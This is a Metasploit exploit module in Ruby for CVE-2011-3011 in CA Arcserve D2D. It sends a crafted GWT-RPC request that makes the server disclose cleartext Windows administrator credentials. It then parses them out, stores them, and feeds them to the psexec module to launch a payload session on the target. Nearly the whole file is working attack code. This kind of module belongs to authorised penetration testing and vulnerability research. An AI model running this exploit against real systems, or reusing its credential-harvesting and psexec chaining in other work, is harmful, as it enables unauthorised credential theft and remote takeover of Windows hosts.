##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
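class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',
        'Description' => %q{
          This module exploits an information disclosure vulnerability in the CA Arcserve
          D2D r15 web server. The information disclosure can be triggered by sending a
          specially crafted RPC request to the homepage servlet. This causes CA Arcserve to
          disclose the username and password in cleartext used for authentication. This
          username and password pair are Windows credentials with Administrator access.
        },
        'Author' => [
          'bannedit', # metasploit module
          'rgod', # original public exploit
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-3011' ],
          [ 'OSVDB', '74162' ],
          [ 'EDB', '17574' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Privileged' => true,
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\x0d\x0a"
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DisclosureDate' => '2011-07-25',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8014),
      ]
    )
  end

  # Service attributes attached to every credential/login record this module
  # creates. The leaked pair are Windows credentials, so they are filed against
  # SMB on 445 rather than against the web port they were leaked from.
  def service_details
    super.merge({
      port: 445,
      service_name: 'smb',
      post_reference_name: refname,
      last_attempted_at: DateTime.now
    })
  end

  # Leak the credentials through the GWT-RPC homepage servlet, then try to turn
  # them into a session with windows/smb/psexec. The credential pair is stored
  # whether or not the psexec attempt succeeds.
  #
  # Raises Msf::Exploit::Failed (via fail_with) when the server does not answer
  # or the response carries no "user" field.
  def exploit
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

    res = send_homepage_rpc
    fail_with(Failure::Unreachable, 'The server did not respond to our request') unless res

    # The server answered over HTTP, so record it even if it turns out not to leak anything.
    report_http_service(res)

    user, pass = extract_credentials(res)
    if user.nil?
      # Not a vulnerable server (blank user/pass doesn't help us)
      fail_with(Failure::NotVulnerable, 'The server did not return credentials')
    end

    print_good("Collected credentials User: '#{user}' Password: '#{pass}'")

    unless attempt_psexec(user, pass)
      # NOTE(review): any exception from psexec lands here, including plain
      # connectivity errors, so INCORRECT may overstate what we know about the
      # password; and with 'RunAsJob' the attempt runs as a background job, so a
      # failed login may not raise here at all. Confirm before relying on the status.
      record_login(user, pass, Metasploit::Model::Login::Status::INCORRECT)
      print_error('Login attempt using windows/smb/psexec failed')
      print_status('Credentials have been stored and may be useful for authentication against other services.')
      return
    end

    record_login(user, pass, Metasploit::Model::Login::Status::SUCCESSFUL)

    # The payload handler for the psexec job is ours (psexec's own is disabled).
    handler
  end

  # Send the getLocalHost GWT-RPC call to the homepage servlet.
  #
  # Returns the Rex HTTP response, or nil when nothing came back within the
  # 5 second timeout.
  def send_homepage_rpc
    # GWT-RPC string table: module base URL, a fixed hash (presumably the
    # serialization-policy strong name - TODO confirm), service interface, method.
    data = [
      '5|0|4|',
      "http://#{datastore['RHOST']}:#{datastore['RPORT']}",
      '/contents/',
      '|2C6B33BED38F825C48AE73C093241510|',
      'com.ca.arcflash.ui.client.homepage.HomepageService',
      '|getLocalHost|1|2|3|4|0|'
    ].join

    cookie = 'donotshowgettingstarted=%7B%22state%22%3Atrue%7D'

    send_request_raw({
      'uri' => '/contents/service/homepage',
      'version' => '1.1',
      'method' => 'POST',
      'cookie' => cookie,
      'data' => data,
      'headers' => {
        'Content-Type' => 'text/x-gwt-rpc; charset=utf-8',
        'Content-Length' => data.length
      }
    }, 5)
  end

  # Pull the leaked "user" / "password" values out of the RPC response.
  #
  # The whole response text is split on commas and the element following each
  # quoted key is taken, so this only understands the serialised layout seen
  # from this servlet. Returns [user, pass]: user is nil when there is no
  # "user" field (or nothing follows it); pass is "" when "password" is absent.
  def extract_credentials(res)
    fields = res.to_s.split(',')
    user = value_after(fields, '"user"')
    pass = value_after(fields, '"password"') || ''
    [user, pass]
  end

  # The unquoted element that follows +key+ in +fields+, or nil when the key is
  # absent or is the last element (the original indexed past the end here).
  def value_after(fields, key)
    idx = fields.index(key)
    return nil if idx.nil?

    value = fields[idx + 1]
    return nil if value.nil?

    value.delete('"')
  end

  # Record the web server that answered the RPC request.
  def report_http_service(res)
    report_service(
      host: datastore['RHOST'],
      port: datastore['RPORT'],
      proto: 'tcp',
      name: 'http',
      info: res.headers['Server'] || ''
    )
  end

  # Store the credential pair with the given Metasploit::Model::Login::Status,
  # filed against the SMB service described by #service_details.
  def record_login(user, pass, status)
    create_credential_and_login({
      user: user,
      private_data: pass,
      status: status
    }.merge(service_details))
  end

  # Run windows/smb/psexec against RHOST with the leaked credentials, reusing
  # this module's payload and LHOST/LPORT. Returns true when the attempt was
  # launched without raising, false when psexec raised.
  def attempt_psexec(user, pass)
    psexec = framework.exploits.create('windows/smb/psexec')
    psexec.register_parent(self)

    psexec.datastore['PAYLOAD'] = datastore['PAYLOAD']

    if datastore['LHOST'] && datastore['LPORT']
      psexec.datastore['LHOST'] = datastore['LHOST']
      psexec.datastore['LPORT'] = datastore['LPORT']
    end

    psexec.datastore['RHOST'] = datastore['RHOST']

    # This module starts its own handler at the end of #exploit, so psexec must
    # not start a second one on the same LHOST/LPORT.
    psexec.datastore['DisablePayloadHandler'] = true
    psexec.datastore['SMBPass'] = pass
    psexec.datastore['SMBUser'] = user

    print_status('Attempting to login via windows/smb/psexec')

    # this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)
    psexec.exploit_simple(
      'LocalInput' => user_input,
      'LocalOutput' => user_output,
      'Payload' => psexec.datastore['PAYLOAD'],
      'RunAsJob' => true
    )
    true
  rescue StandardError => e
    # Surface the underlying reason in verbose mode; the caller reports the failure.
    vprint_error("windows/smb/psexec raised #{e.class}: #{e.message}")
    false
  end
end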